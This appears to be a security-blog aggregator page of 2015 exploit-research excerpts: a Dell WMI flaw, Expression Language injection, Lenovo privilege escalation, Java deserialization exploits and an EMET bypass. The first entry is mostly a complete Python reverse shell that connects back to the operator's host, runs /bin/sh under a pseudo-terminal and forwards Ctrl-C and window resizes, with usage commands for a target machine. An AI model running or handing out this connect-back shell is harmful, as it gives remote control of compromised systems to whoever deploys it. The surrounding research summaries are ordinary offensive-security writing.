Friday December 25th
Friday December 18th
Thursday December 3rd
If you like exploitation, surely you've had your own reverse or connect-back shells. Set up a listening netcat, run the payload and boom: you get a shell back! Then you explore the box, start a program, want to stop it, and hit Ctrl-C... no!!! You just lost your shell, because that interrupted netcat, not the remote process. In this post we'll look at shells and terminals, from the simplest, like this netcat with /bin/sh over the network, to a remote terminal emulator supporting terminal window size changes out of band. Think of all the goodness SSH is doing for you: could we attempt something like it?
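The Ctrl-C problem above, as an added example that is not code from the post: the local terminal's line discipline turns ^C into SIGINT for the foreground process (netcat) instead of sending it anywhere. The handler below puts the local terminal into raw mode, so ^C travels as the byte 0x03 and the pty on the remote side (which keeps its default ISIG setting) delivers SIGINT to the remote job. It also carries terminal window-size changes out of band using a small escape-based framing (0xFF is the marker byte; 0xFF 0xFF is a literal 0xFF, 0xFF 0x01 rows cols is a resize). The framing, the function names and the two-command CLI are assumptions for illustration, not a standard or anything from the original post. The remote side needs only Python and /bin/sh.

```python
# Added example: raw-mode reverse shell handler with out-of-band window size.
# Framing (assumed, illustration only): 0xFF 0xFF = literal 0xFF byte,
# 0xFF 0x01 <rows:u16 BE> <cols:u16 BE> = window-size update.
import fcntl, os, pty, select, signal, socket, struct, sys, termios, tty

ESC, OP_WINSIZE = 0xFF, 0x01

def encode_data(data: bytes) -> bytes:
    """Escape the marker byte so terminal output can never look like a control frame."""
    return data.replace(bytes([ESC]), bytes([ESC, ESC]))

def encode_winsize(rows: int, cols: int) -> bytes:
    return bytes([ESC, OP_WINSIZE]) + struct.pack(">HH", rows, cols)

class Decoder:
    """Incremental decoder; tolerates frames split across socket reads."""
    def __init__(self):
        self.buf = b""
    def feed(self, chunk: bytes):
        self.buf += chunk
        data, events, i = bytearray(), [], 0
        while i < len(self.buf):
            b = self.buf[i]
            if b != ESC:
                data.append(b); i += 1
            elif i + 1 >= len(self.buf):
                break                                   # incomplete escape, wait for more
            elif self.buf[i + 1] == ESC:
                data.append(ESC); i += 2                # escaped literal 0xFF
            elif self.buf[i + 1] == OP_WINSIZE:
                if i + 6 > len(self.buf):
                    break                               # incomplete frame, wait for more
                events.append(struct.unpack(">HH", self.buf[i + 2:i + 6])); i += 6
            else:
                i += 2                                  # unknown op: drop it
        self.buf = self.buf[i:]
        return bytes(data), events

def get_winsize(fd):
    rows, cols = struct.unpack("HHHH", fcntl.ioctl(fd, termios.TIOCGWINSZ, b"\0" * 8))[:2]
    return rows, cols

def set_winsize(fd, rows, cols):
    fcntl.ioctl(fd, termios.TIOCSWINSZ, struct.pack("HHHH", rows, cols, 0, 0))

def relay(sock, rfd, wfd, on_winsize):
    """Pump bytes between the socket and a local fd pair until either side closes."""
    dec = Decoder()
    while True:
        for r in select.select([sock, rfd], [], [])[0]:
            if r is sock:
                chunk = sock.recv(4096)
                if not chunk:
                    return
                data, events = dec.feed(chunk)
                for rows, cols in events:
                    on_winsize(rows, cols)
                if data:
                    os.write(wfd, data)
            else:
                try:
                    data = os.read(rfd, 4096)
                except OSError:        # pty master raises EIO once the child exits
                    return
                if not data:
                    return
                sock.sendall(encode_data(data))

def agent(host, port):
    """Remote side: connect back, run /bin/sh under a pty, apply resize frames to it."""
    sock = socket.create_connection((host, port))
    pid, master = pty.fork()
    if pid == 0:
        os.execv("/bin/sh", ["/bin/sh", "-i"])
    relay(sock, master, master, lambda rows, cols: set_winsize(master, rows, cols))

def handler(port):
    """Local side: raw mode means ^C is forwarded as 0x03 instead of killing us."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port)); srv.listen(1)
    sock, _ = srv.accept()
    fd, saved = sys.stdin.fileno(), termios.tcgetattr(sys.stdin.fileno())
    signal.signal(signal.SIGWINCH, lambda *_: sock.sendall(encode_winsize(*get_winsize(fd))))
    sock.sendall(encode_winsize(*get_winsize(fd)))   # initial size, then on every SIGWINCH
    tty.setraw(fd)
    try:
        relay(sock, fd, sys.stdout.fileno(), lambda rows, cols: None)
    finally:
        termios.tcsetattr(fd, termios.TCSADRAIN, saved)

if __name__ == "__main__":
    if sys.argv[1] == "listen":
        handler(int(sys.argv[2]))
    else:                                  # python3 shell.py connect <host> <port>
        agent(sys.argv[2], int(sys.argv[3]))
```

Run `python3 shell.py listen 4444` locally and `python3 shell.py connect <your-ip> 4444` on the target; Ctrl-C then interrupts the remote program, and resizing your window is reflected in the remote pty. The marker byte 0xFF never occurs in valid UTF-8 output, which is why it is cheap to escape; note the resize channel only flows from handler to agent, and nothing here is encrypted, which is one of the things SSH does for you.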
On December 1, 2015, a really interesting vulnerability was disclosed in the Dell Foundation Services software. If installed, a SOAP service will listen on port 7779 and grant an attacker the ability to execute unauthenticated WMI queries. I can’t say I’ve ever encountered such a vulnerability class, so this posed an interesting thought exercise in how an attacker might effectively exploit such a vulnerability beyond just using the queries to conduct host recon. Specifically, this vulnerability only allows an attacker to query WMI object instances within the default namespace – ROOT/CIMv2. This means that you cannot invoke WMI methods or perform event registration, i.e., this is not a remote code execution vulnerability.
Tuesday December 1st
Wow! It may lead to remote command execution on modern Servlet environments. This was pointed out by Dan Amodio in 2012 with his artful exploit against the Spring Double-Evaluation vulnerability (CVE-2011-2730). There he ported the exploitation technique presented in this Vulnerability Research Paper by Minded Security and Aspect Security in 2011 to newer Servlet versions, reaching RCE (Remote Code Execution, which implies Remote Command Execution as well). In this blog post we discuss a different payload to exploit an Expression Language Injection security issue in a reliable way. This is sometimes the case during penetration tests of sensitive targets, where it's important not to alter the local application by downloading external content or modifying the local file system.
Lenovo released a new version of the Lenovo System Update advisory (https://support.lenovo.com/ar/es/product_security/lsu_privilege) about two new privilege escalation vulnerabilities I had reported to Lenovo a couple of weeks ago (CVE-2015-8109, CVE-2015-8110). IOActive and Lenovo have issued advisories on these issues. Before digging into the details, let’s go over a high-level overview of how the Lenovo System Update pops up the GUI application with Administrator privileges.
Just a few weeks ago I attended an amazing training on exploit development on Windows, the Corelan Bootcamp. I have to admit, it’s probably the best instructor-led course I have ever attended; massive props to Peter “corelanc0d3r”, who is a fantastic teacher, and to OJ “TheColonial” for organising it. Okay, with credits out of the way, let’s talk exploits! Since everything I learned at the bootcamp is still fresh in my head, I thought it would be good to practice it a bit more and make sure all of the information sinks in properly.
Inter-Process Communication (IPC) is a ubiquitous part of modern computing. Processes often talk to each other, and many software packages contain multiple components that need to exchange data to run properly. Named pipes are one of the many forms of IPC in use today and are extensively used on the Windows platform as a means to exchange data between running processes in a semi-persistent manner.
Monday November 16th
Sunday November 15th
Friday November 6th
The most underrated, underhyped vulnerability of 2015 has recently come to my attention, and I’m about to bring it to yours. No one gave it a fancy name, there were no press releases, nobody called Mandiant to come put out the fires. In fact, even though proof-of-concept code was released OVER 9 MONTHS AGO, none of the products mentioned in the title of this post have been patched, along with many more. In fact, no patch is available for the Java library containing the vulnerability. In addition to any commercial products that are vulnerable, this also affects many custom applications. In this post I’ll be dropping pre-authentication, remote code execution exploits that leverage this vulnerability for WebLogic, WebSphere, JBoss, Jenkins, and OpenNMS. All on the newest versions. Even more interesting, I’ll detail the process we went through to discover that these products were vulnerable, and how I developed the exploits. This should empower you to go out and find this same bug in your own software or commercial products that you or your clients use. All code can be found on the FoxGlove Security Github.
Tuesday November 3rd
• While much of public vulnerability research focuses on pure 32-bit app exploitation, the fact is, a significant portion of 32-bit software is now running on 64-bit operating systems.
• In this report, we’ll demonstrate a technique to bypass all payload/shellcode execution and ROP-related mitigations provided by EMET using the WoW64 compatibility layer provided in 64-bit Windows editions.
• To demonstrate how we can bypass EMET by abusing WoW64, we’ll modify an existing use-after-free Adobe Flash exploit.
• We’ll also discuss limitations and avenues of exploitation, obfuscation, and anti-emulation imposed by WoW64 on 32-bit applications.
In this post I’ll be dropping a tool and set of techniques that red teams can use to maintain anonymous, covert access to compromised machines. I’ll also present some advice for defenders looking to detect and respond to these types of attack. This is not a brand new idea, but as far as I’m aware it hasn’t been very thoroughly discussed from the perspective of penetration testing and red teaming. Malware authors have been using these techniques since at least 2012. If they’re doing it, we should be too.
Wednesday October 14th
In this blog post, we’ll take a look at an example of a typical targeted attack with OS X malware as well as discover how to hunt for it in CrowdStrike’s Falcon Host Endpoint Activity Monitoring (EAM) application. One of the most unique features of this solution is that we don’t need to waste time or impact system performance by running any type of incident response script on the host. Using EAM negates the extra work of tracking down a computer, making sure it is on, dealing with possible network issues, and waiting for gigabytes of data to transfer back for analysis. The data is collected transparently and continuously, and it is always available for immediate search and analysis. We like to call this Instant Response.